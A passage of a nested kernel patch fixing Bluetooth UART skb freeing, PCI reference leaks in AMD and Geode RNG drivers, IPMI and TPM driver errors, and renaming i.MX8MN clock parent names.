+ 		BT_ERR("illegal hcill state: %ld (losing packet)",
+ 		       ll->hcill_state);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 8df11016fd51b..bae9b2a408d95 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -912,7 +912,7 @@ static int qca_enqueue(struct hci_uart *hu, struct sk_buff *skb)
+ 	default:
+ 		BT_ERR("Illegal tx state: %d (losing packet)",
+ 		       qca->tx_ibs_state);
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/char/hw_random/amd-rng.c b/drivers/char/hw_random/amd-rng.c
+index c22d4184bb612..0555e3838bce1 100644
+--- a/drivers/char/hw_random/amd-rng.c
++++ b/drivers/char/hw_random/amd-rng.c
+@@ -143,15 +143,19 @@ static int __init amd_rng_mod_init(void)
+ found:
+ 	err = pci_read_config_dword(pdev, 0x58, &pmbase);
+ 	if (err)
+-		return err;
++		goto put_dev;
+ 
+ 	pmbase &= 0x0000FF00;
+-	if (pmbase == 0)
+-		return -EIO;
++	if (pmbase == 0) {
++		err = -EIO;
++		goto put_dev;
++	}
+ 
+ 	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
+-	if (!priv)
+-		return -ENOMEM;
++	if (!priv) {
++		err = -ENOMEM;
++		goto put_dev;
++	}
+ 
+ 	if (!request_region(pmbase + PMBASE_OFFSET, PMBASE_SIZE, DRV_NAME)) {
+ 		dev_err(&pdev->dev, DRV_NAME " region 0x%x already in use!\n",
+@@ -185,6 +189,8 @@ err_iomap:
+ 	release_region(pmbase + PMBASE_OFFSET, PMBASE_SIZE);
+ out:
+ 	kfree(priv);
++put_dev:
++	pci_dev_put(pdev);
+ 	return err;
+ }
+ 
+@@ -200,6 +206,8 @@ static void __exit amd_rng_mod_exit(void)
+ 
+ 	release_region(priv->pmbase + PMBASE_OFFSET, PMBASE_SIZE);
+ 
++	pci_dev_put(priv->pcidev);
++
+ 	kfree(priv);
+ }
+ 
+diff --git a/drivers/char/hw_random/geode-rng.c b/drivers/char/hw_random/geode-rng.c
+index 138ce434f86b2..12fbe80918319 100644
+--- a/drivers/char/hw_random/geode-rng.c
++++ b/drivers/char/hw_random/geode-rng.c
+@@ -51,6 +51,10 @@ static const struct pci_device_id pci_tbl[] = {
+ };
+ MODULE_DEVICE_TABLE(pci, pci_tbl);
+ 
++struct amd_geode_priv {
++	struct pci_dev *pcidev;
++	void __iomem *membase;
++};
+ 
+ static int geode_rng_data_read(struct hwrng *rng, u32 *data)
+ {
+@@ -90,6 +94,7 @@ static int __init geode_rng_init(void)
+ 	const struct pci_device_id *ent;
+ 	void __iomem *mem;
+ 	unsigned long rng_base;
++	struct amd_geode_priv *priv;
+ 
+ 	for_each_pci_dev(pdev) {
+ 		ent = pci_match_id(pci_tbl, pdev);
+@@ -97,17 +102,26 @@ static int __init geode_rng_init(void)
+ 			goto found;
+ 	}
+ 	/* Device not found. */
+-	goto out;
++	return err;
+ 
+ found:
++	priv = kzalloc(sizeof(*priv), GFP_KERNEL);
++	if (!priv) {
++		err = -ENOMEM;
++		goto put_dev;
++	}
++
+ 	rng_base = pci_resource_start(pdev, 0);
+ 	if (rng_base == 0)
+-		goto out;
++		goto free_priv;
+ 	err = -ENOMEM;
+ 	mem = ioremap(rng_base, 0x58);
+ 	if (!mem)
+-		goto out;
+-	geode_rng.priv = (unsigned long)mem;
++		goto free_priv;
++
++	geode_rng.priv = (unsigned long)priv;
++	priv->membase = mem;
++	priv->pcidev = pdev;
+ 
+ 	pr_info("AMD Geode RNG detected\n");
+ 	err = hwrng_register(&geode_rng);
+@@ -116,20 +130,26 @@ found:
+ 		       err);
+ 		goto err_unmap;
+ 	}
+-out:
+ 	return err;
+ 
+ err_unmap:
+ 	iounmap(mem);
+-	goto out;
++free_priv:
++	kfree(priv);
++put_dev:
++	pci_dev_put(pdev);
++	return err;
+ }
+ 
+ static void __exit geode_rng_exit(void)
+ {
+-	void __iomem *mem = (void __iomem *)geode_rng.priv;
++	struct amd_geode_priv *priv;
+ 
++	priv = (struct amd_geode_priv *)geode_rng.priv;
+ 	hwrng_unregister(&geode_rng);
+-	iounmap(mem);
++	iounmap(priv->membase);
++	pci_dev_put(priv->pcidev);
++	kfree(priv);
+ }
+ 
+ module_init(geode_rng_init);
+diff --git a/drivers/char/ipmi/ipmi_msghandler.c b/drivers/char/ipmi/ipmi_msghandler.c
+index 49a1707693c9f..d5ee52be176d3 100644
+--- a/drivers/char/ipmi/ipmi_msghandler.c
++++ b/drivers/char/ipmi/ipmi_msghandler.c
+@@ -3704,12 +3704,16 @@ static void deliver_smi_err_response(struct ipmi_smi *intf,
+ 				     struct ipmi_smi_msg *msg,
+ 				     unsigned char err)
+ {
++	int rv;
+ 	msg->rsp[0] = msg->data[0] | 4;
+ 	msg->rsp[1] = msg->data[1];
+ 	msg->rsp[2] = err;
+ 	msg->rsp_size = 3;
+-	/* It's an error, so it will never requeue, no need to check return. */
+-	handle_one_recv_msg(intf, msg);
++
++	/* This will never requeue, but it may ask us to free the message. */
++	rv = handle_one_recv_msg(intf, msg);
++	if (rv == 0)
++		ipmi_free_smi_msg(msg);
+ }
+ 
+ static void cleanup_smi_msgs(struct ipmi_smi *intf)
+diff --git a/drivers/char/ipmi/kcs_bmc_aspeed.c b/drivers/char/ipmi/kcs_bmc_aspeed.c
+index 19c32bf50e0e9..2dea8cd5a09ac 100644
+--- a/drivers/char/ipmi/kcs_bmc_aspeed.c
++++ b/drivers/char/ipmi/kcs_bmc_aspeed.c
+@@ -406,13 +406,31 @@ static void aspeed_kcs_check_obe(struct timer_list *timer)
+ static void aspeed_kcs_irq_mask_update(struct kcs_bmc_device *kcs_bmc, u8 mask, u8 state)
+ {
+ 	struct aspeed_kcs_bmc *priv = to_aspeed_kcs_bmc(kcs_bmc);
++	int rc;
++	u8 str;
+ 
+ 	/* We don't have an OBE IRQ, emulate it */
+ 	if (mask & KCS_BMC_EVENT_TYPE_OBE) {
+-		if (KCS_BMC_EVENT_TYPE_OBE & state)
+-			mod_timer(&priv->obe.timer, jiffies + OBE_POLL_PERIOD);
+-		else
++		if (KCS_BMC_EVENT_TYPE_OBE & state) {
++			/*
++			 * Given we don't have an OBE IRQ, delay by polling briefly to see if we can
++			 * observe such an event before returning to the caller. This is not
++			 * incorrect because OBF may have already become clear before enabling the
++			 * IRQ if we had one, under which circumstance no event will be propagated
++			 * anyway.
++			 *
++			 * The onus is on the client to perform a race-free check that it hasn't
++			 * missed the event.
++			 */
++			rc = read_poll_timeout_atomic(aspeed_kcs_inb, str,
++						      !(str & KCS_BMC_STR_OBF), 1, 100, false,
++						      &priv->kcs_bmc, priv->kcs_bmc.ioreg.str);
++			/* Time for the slow path? */
++			if (rc == -ETIMEDOUT)
++				mod_timer(&priv->obe.timer, jiffies + OBE_POLL_PERIOD);
++		} else {
+ 			del_timer(&priv->obe.timer);
++		}
+ 	}
+ 
+ 	if (mask & KCS_BMC_EVENT_TYPE_IBF) {
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 18606651d1aa4..65f8f179a27f0 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -252,7 +252,7 @@ static int __crb_relinquish_locality(struct device *dev,
+ 	iowrite32(CRB_LOC_CTRL_RELINQUISH, &priv->regs_h->loc_ctrl);
+ 	if (!crb_wait_for_reg_32(&priv->regs_h->loc_state, mask, value,
+ 				 TPM2_TIMEOUT_C)) {
+-		dev_warn(dev, "TPM_LOC_STATE_x.requestAccess timed out\n");
++		dev_warn(dev, "TPM_LOC_STATE_x.Relinquish timed out\n");
+ 		return -ETIME;
+ 	}
+ 
+diff --git a/drivers/char/tpm/tpm_ftpm_tee.c b/drivers/char/tpm/tpm_ftpm_tee.c
+index 5c233423c56fa..deff23bb54bf1 100644
+--- a/drivers/char/tpm/tpm_ftpm_tee.c
++++ b/drivers/char/tpm/tpm_ftpm_tee.c
+@@ -397,7 +397,13 @@ static int __init ftpm_mod_init(void)
+ 	if (rc)
+ 		return rc;
+ 
+-	return driver_register(&ftpm_tee_driver.driver);
++	rc = driver_register(&ftpm_tee_driver.driver);
++	if (rc) {
++		platform_driver_unregister(&ftpm_tee_plat_driver);
++		return rc;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit ftpm_mod_exit(void)
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 757623bacfd50..3f98e587b3e84 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -682,15 +682,19 @@ static bool tpm_tis_req_canceled(struct tpm_chip *chip, u8 status)
+ {
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	switch (priv->manufacturer_id) {
+-	case TPM_VID_WINBOND:
+-		return ((status == TPM_STS_VALID) ||
+-			(status == (TPM_STS_VALID | TPM_STS_COMMAND_READY)));
+-	case TPM_VID_STM:
+-		return (status == (TPM_STS_VALID | TPM_STS_COMMAND_READY));
+-	default:
+-		return (status == TPM_STS_COMMAND_READY);
++	if (!test_bit(TPM_TIS_DEFAULT_CANCELLATION, &priv->flags)) {
++		switch (priv->manufacturer_id) {
++		case TPM_VID_WINBOND:
++			return ((status == TPM_STS_VALID) ||
++				(status == (TPM_STS_VALID | TPM_STS_COMMAND_READY)));
++		case TPM_VID_STM:
++			return (status == (TPM_STS_VALID | TPM_STS_COMMAND_READY));
++		default:
++			break;
++		}
+ 	}
++
++	return status == TPM_STS_COMMAND_READY;
+ }
+ 
+ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index 66a5a13cd1df2..b68479e0de10f 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -86,6 +86,7 @@ enum tis_defaults {
+ enum tpm_tis_flags {
+ 	TPM_TIS_ITPM_WORKAROUND		= BIT(0),
+ 	TPM_TIS_INVALID_STATUS		= BIT(1),
++	TPM_TIS_DEFAULT_CANCELLATION	= BIT(2),
+ };
+ 
+ struct tpm_tis_data {
+diff --git a/drivers/char/tpm/tpm_tis_i2c.c b/drivers/char/tpm/tpm_tis_i2c.c
+index 0692510dfcab9..f3a7251c8e38f 100644
+--- a/drivers/char/tpm/tpm_tis_i2c.c
++++ b/drivers/char/tpm/tpm_tis_i2c.c
+@@ -49,7 +49,7 @@
+ 
+ /* Masks with bits that must be read zero */
+ #define TPM_ACCESS_READ_ZERO 0x48
+-#define TPM_INT_ENABLE_ZERO 0x7FFFFF6
++#define TPM_INT_ENABLE_ZERO 0x7FFFFF60
+ #define TPM_STS_READ_ZERO 0x23
+ #define TPM_INTF_CAPABILITY_ZERO 0x0FFFF000
+ #define TPM_I2C_INTERFACE_CAPABILITY_ZERO 0x80000000
+@@ -329,6 +329,7 @@ static int tpm_tis_i2c_probe(struct i2c_client *dev,
+ 	if (!phy->io_buf)
+ 		return -ENOMEM;
+ 
++	set_bit(TPM_TIS_DEFAULT_CANCELLATION, &phy->priv.flags);
+ 	phy->i2c_client = dev;
+ 
+ 	/* must precede all communication with the tpm */
+diff --git a/drivers/clk/imx/clk-imx8mn.c b/drivers/clk/imx/clk-imx8mn.c
+index d37c45b676abe..2afea905f7f3c 100644
+--- a/drivers/clk/imx/clk-imx8mn.c
++++ b/drivers/clk/imx/clk-imx8mn.c
+@@ -27,10 +27,10 @@ static u32 share_count_nand;
+ static const char * const pll_ref_sels[] = { "osc_24m", "dummy", "dummy", "dummy", };
+ static const char * const audio_pll1_bypass_sels[] = {"audio_pll1", "audio_pll1_ref_sel", };
+ static const char * const audio_pll2_bypass_sels[] = {"audio_pll2", "audio_pll2_ref_sel", };
+-static const char * const video_pll1_bypass_sels[] = {"video_pll1", "video_pll1_ref_sel", };
++static const char * const video_pll_bypass_sels[] = {"video_pll", "video_pll_ref_sel", };
+ static const char * const dram_pll_bypass_sels[] = {"dram_pll", "dram_pll_ref_sel", };
+ static const char * const gpu_pll_bypass_sels[] = {"gpu_pll", "gpu_pll_ref_sel", };
+-static const char * const vpu_pll_bypass_sels[] = {"vpu_pll", "vpu_pll_ref_sel", };
++static const char * const m7_alt_pll_bypass_sels[] = {"m7_alt_pll", "m7_alt_pll_ref_sel", };
+ static const char * const arm_pll_bypass_sels[] = {"arm_pll", "arm_pll_ref_sel", };
+ static const char * const sys_pll3_bypass_sels[] = {"sys_pll3", "sys_pll3_ref_sel", };
+ 
+@@ -40,24 +40,24 @@ static const char * const imx8mn_a53_sels[] = {"osc_24m", "arm_pll_out", "sys_pl
+ 
+ static const char * const imx8mn_a53_core_sels[] = {"arm_a53_div", "arm_pll_out", };
+ 
+-static const char * const imx8mn_m7_sels[] = {"osc_24m", "sys_pll2_200m", "sys_pll2_250m", "vpu_pll_out",
+-				       "sys_pll1_800m", "audio_pll1_out", "video_pll1_out", "sys_pll3_out", };
++static const char * const imx8mn_m7_sels[] = {"osc_24m", "sys_pll2_200m", "sys_pll2_250m", "m7_alt_pll_out",
++				       "sys_pll1_800m", "audio_pll1_out", "video_pll_out", "sys_pll3_out", };
+ 
+ static const char * const imx8mn_gpu_core_sels[] = {"osc_24m", "gpu_pll_out", "sys_pll1_800m",
+ 						    "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						    "video_pll1_out", "audio_pll2_out", };
++						    "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_gpu_shader_sels[] = {"osc_24m", "gpu_pll_out", "sys_pll1_800m",
+ 						      "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						      "video_pll1_out", "audio_pll2_out", };
++						      "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_main_axi_sels[] = {"osc_24m", "sys_pll2_333m", "sys_pll1_800m",
+ 						    "sys_pll2_250m", "sys_pll2_1000m", "audio_pll1_out",
+-						    "video_pll1_out", "sys_pll1_100m",};
++						    "video_pll_out", "sys_pll1_100m",};
+ 
+ static const char * const imx8mn_enet_axi_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll1_800m",
+ 						    "sys_pll2_250m", "sys_pll2_200m", "audio_pll1_out",
+-						    "video_pll1_out", "sys_pll3_out", };
++						    "video_pll_out", "sys_pll3_out", };
+ 
+ static const char * const imx8mn_nand_usdhc_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll1_800m",
+ 						      "sys_pll2_200m", "sys_pll1_133m", "sys_pll3_out",
+@@ -77,23 +77,23 @@ static const char * const imx8mn_usb_bus_sels[] = {"osc_24m", "sys_pll2_500m", "
+ 
+ static const char * const imx8mn_gpu_axi_sels[] = {"osc_24m", "sys_pll1_800m", "gpu_pll_out",
+ 						   "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						   "video_pll1_out", "audio_pll2_out", };
++						   "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_gpu_ahb_sels[] = {"osc_24m", "sys_pll1_800m", "gpu_pll_out",
+ 						   "sys_pll3_out", "sys_pll2_1000m", "audio_pll1_out",
+-						   "video_pll1_out", "audio_pll2_out", };
++						   "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_noc_sels[] = {"osc_24m", "sys_pll1_800m", "sys_pll3_out",
+ 					       "sys_pll2_1000m", "sys_pll2_500m", "audio_pll1_out",
+-					       "video_pll1_out", "audio_pll2_out", };
++					       "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_ahb_sels[] = {"osc_24m", "sys_pll1_133m", "sys_pll1_800m",
+ 					       "sys_pll1_400m", "sys_pll2_125m", "sys_pll3_out",
+-					       "audio_pll1_out", "video_pll1_out", };
++					       "audio_pll1_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_audio_ahb_sels[] = {"osc_24m", "sys_pll2_500m", "sys_pll1_800m",
+ 						     "sys_pll2_1000m", "sys_pll2_166m", "sys_pll3_out",
+-						     "audio_pll1_out", "video_pll1_out", };
++						     "audio_pll1_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_dram_alt_sels[] = {"osc_24m", "sys_pll1_800m", "sys_pll1_100m",
+ 						    "sys_pll2_500m", "sys_pll2_1000m", "sys_pll3_out",
+@@ -103,49 +103,49 @@ static const char * const imx8mn_dram_apb_sels[] = {"osc_24m", "sys_pll2_200m",
+ 						    "sys_pll1_160m", "sys_pll1_800m", "sys_pll3_out",
+ 						    "sys_pll2_250m", "audio_pll2_out", };
+ 
+-static const char * const imx8mn_disp_pixel_sels[] = {"osc_24m", "video_pll1_out", "audio_pll2_out",
++static const char * const imx8mn_disp_pixel_sels[] = {"osc_24m", "video_pll_out", "audio_pll2_out",
+ 						      "audio_pll1_out", "sys_pll1_800m", "sys_pll2_1000m",
+ 						      "sys_pll3_out", "clk_ext4", };
+ 
+ static const char * const imx8mn_sai2_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
+-						"clk_ext3", "clk_ext4", };
++						"video_pll_out", "sys_pll1_133m", "dummy",
++						"clk_ext2", "clk_ext3", };
+ 
+ static const char * const imx8mn_sai3_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext3", "clk_ext4", };
+ 
+ static const char * const imx8mn_sai5_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext2", "clk_ext3", };
+ 
+ static const char * const imx8mn_sai6_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext3", "clk_ext4", };
+ 
+ static const char * const imx8mn_sai7_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						"video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						"video_pll_out", "sys_pll1_133m", "dummy",
+ 						"clk_ext3", "clk_ext4", };
+ 
+ static const char * const imx8mn_spdif1_sels[] = {"osc_24m", "audio_pll1_out", "audio_pll2_out",
+-						  "video_pll1_out", "sys_pll1_133m", "osc_hdmi",
++						  "video_pll_out", "sys_pll1_133m", "dummy",
+ 						  "clk_ext2", "clk_ext3", };
+ 
+ static const char * const imx8mn_enet_ref_sels[] = {"osc_24m", "sys_pll2_125m", "sys_pll2_50m",
+ 						    "sys_pll2_100m", "sys_pll1_160m", "audio_pll1_out",
+-						    "video_pll1_out", "clk_ext4", };
++						    "video_pll_out", "clk_ext4", };
+ 
+ static const char * const imx8mn_enet_timer_sels[] = {"osc_24m", "sys_pll2_100m", "audio_pll1_out",
+ 						      "clk_ext1", "clk_ext2", "clk_ext3",
+-						      "clk_ext4", "video_pll1_out", };
++						      "clk_ext4", "video_pll_out", };
+ 
+ static const char * const imx8mn_enet_phy_sels[] = {"osc_24m", "sys_pll2_50m", "sys_pll2_125m",
+-						    "sys_pll2_200m", "sys_pll2_500m", "video_pll1_out",
+-						    "audio_pll2_out", };
++						    "sys_pll2_200m", "sys_pll2_500m", "audio_pll1_out",
++						    "video_pll_out", "audio_pll2_out", };
+ 
+ static const char * const imx8mn_nand_sels[] = {"osc_24m", "sys_pll2_500m", "audio_pll1_out",
+ 						"sys_pll1_400m", "audio_pll2_out", "sys_pll3_out",
+-						"sys_pll2_250m", "video_pll1_out", };
++						"sys_pll2_250m", "video_pll_out", };
+ 
+ static const char * const imx8mn_qspi_sels[] = {"osc_24m", "sys_pll1_400m", "sys_pll2_333m",
+ 						"sys_pll2_500m", "audio_pll2_out", "sys_pll1_266m",
+@@ -160,19 +160,19 @@ static const char * const imx8mn_usdhc2_sels[] = {"osc_24m", "sys_pll1_400m", "s
+ 						  "audio_pll2_out", "sys_pll1_100m", };
+ 
+ static const char * const imx8mn_i2c1_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out", "audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out", "audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_i2c2_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out", "audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out", "audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_i2c3_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out", "audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out", "audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_i2c4_sels[] = {"osc_24m", "sys_pll1_160m", "sys_pll2_50m",
+-						"sys_pll3_out",	"audio_pll1_out", "video_pll1_out",
++						"sys_pll3_out",	"audio_pll1_out", "video_pll_out",
+ 						"audio_pll2_out", "sys_pll1_133m", };
+ 
+ static const char * const imx8mn_uart1_sels[] = {"osc_24m", "sys_pll1_80m", "sys_pll2_200m",
+@@ -213,63 +213,63 @@ static const char * const imx8mn_ecspi2_sels[] = {"osc_24m", "sys_pll2_200m", "s
+ 
+ static const char * const imx8mn_pwm1_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext1",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_pwm2_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext1",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_pwm3_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext2",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_pwm4_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_160m",
+ 						"sys_pll1_40m", "sys_pll3_out", "clk_ext2",
+-						"sys_pll1_80m", "video_pll1_out", };
++						"sys_pll1_80m", "video_pll_out", };
+ 
+ static const char * const imx8mn_gpt1_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt2_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt3_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt4_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt5_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_gpt6_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_400m",
+-						"sys_pll1_40m", "video_pll1_out", "sys_pll1_80m",
++						"sys_pll1_40m", "video_pll_out", "sys_pll1_80m",
+ 						"audio_pll1_out", "clk_ext1", };
+ 
+ static const char * const imx8mn_wdog_sels[] = {"osc_24m", "sys_pll1_133m", "sys_pll1_160m",
+-						"vpu_pll_out", "sys_pll2_125m", "sys_pll3_out",
++						"m7_alt_pll_out", "sys_pll2_125m", "sys_pll3_out",
+ 						"sys_pll1_80m", "sys_pll2_166m", };
+ 
+-static const char * const imx8mn_wrclk_sels[] = {"osc_24m", "sys_pll1_40m", "vpu_pll_out",
++static const char * const imx8mn_wrclk_sels[] = {"osc_24m", "sys_pll1_40m", "m7_alt_pll_out",
+ 						 "sys_pll3_out", "sys_pll2_200m", "sys_pll1_266m",
+ 						 "sys_pll2_500m", "sys_pll1_100m", };
+ 
+ static const char * const imx8mn_dsi_core_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll2_250m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+-						    "audio_pll2_out", "video_pll1_out", };
++						    "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_dsi_phy_sels[] = {"osc_24m", "sys_pll2_125m", "sys_pll2_100m",
+ 						   "sys_pll1_800m", "sys_pll2_1000m", "clk_ext2",
+-						   "audio_pll2_out", "video_pll1_out", };
++						   "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_dsi_dbi_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll2_100m",
+ 						   "sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+-						   "audio_pll2_out", "video_pll1_out", };
++						   "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_usdhc3_sels[] = {"osc_24m", "sys_pll1_400m", "sys_pll1_800m",
+ 						  "sys_pll2_500m", "sys_pll3_out", "sys_pll1_266m",
+@@ -277,15 +277,15 @@ static const char * const imx8mn_usdhc3_sels[] = {"osc_24m", "sys_pll1_400m", "s
+ 
+ static const char * const imx8mn_camera_pixel_sels[] = {"osc_24m", "sys_pll1_266m", "sys_pll2_250m",
+ 							"sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+-							"audio_pll2_out", "video_pll1_out", };
++							"audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_csi1_phy_sels[] = {"osc_24m", "sys_pll2_333m", "sys_pll2_100m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "clk_ext2",
+-						    "audio_pll2_out", "video_pll1_out", };
++						    "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_csi2_phy_sels[] = {"osc_24m", "sys_pll2_333m", "sys_pll2_100m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "clk_ext2",
+-						    "audio_pll2_out", "video_pll1_out", };
++						    "audio_pll2_out", "video_pll_out", };
+ 
+ static const char * const imx8mn_csi2_esc_sels[] = {"osc_24m", "sys_pll2_100m", "sys_pll1_80m",
+ 						    "sys_pll1_800m", "sys_pll2_1000m", "sys_pll3_out",
+@@ -306,9 +306,9 @@ static const char * const imx8mn_clko1_sels[] = {"osc_24m", "sys_pll1_800m", "du
+ 						 "dummy", "sys_pll1_80m", };
+ static const char * const imx8mn_clko2_sels[] = {"osc_24m", "sys_pll2_200m", "sys_pll1_400m",
+ 						 "sys_pll2_166m", "sys_pll3_out", "audio_pll1_out",
+-						 "video_pll1_out", "osc_32k", };
++						 "video_pll_out", "osc_32k", };
+ 
+-static const char * const clkout_sels[] = {"audio_pll1_out", "audio_pll2_out", "video_pll1_out",
++static const char * const clkout_sels[] = {"audio_pll1_out", "audio_pll2_out", "video_pll_out",
+ 					   "dummy", "dummy", "gpu_pll_out", "dummy",
+ 					   "arm_pll_out", "sys_pll1", "sys_pll2", "sys_pll3",
+ 					   "dummy", "dummy", "osc_24m", "dummy", "osc_32k"};
+@@ -349,19 +349,19 @@ static int imx8mn_clocks_probe(struct platform_device *pdev)
+ 
+ 	hws[IMX8MN_AUDIO_PLL1_REF_SEL] = imx_clk_hw_mux("audio_pll1_ref_sel", base + 0x0, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_AUDIO_PLL2_REF_SEL] = imx_clk_hw_mux("audio_pll2_ref_sel", base + 0x14, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+-	hws[IMX8MN_VIDEO_PLL1_REF_SEL] = imx_clk_hw_mux("video_pll1_ref_sel", base + 0x28, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
++	hws[IMX8MN_VIDEO_PLL_REF_SEL] = imx_clk_hw_mux("video_pll_ref_sel", base + 0x28, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_DRAM_PLL_REF_SEL] = imx_clk_hw_mux("dram_pll_ref_sel", base + 0x50, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MN_GPU_PLL_REF_SEL] = imx_clk_hw_mux("gpu_pll_ref_sel", base + 0x64, 0, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
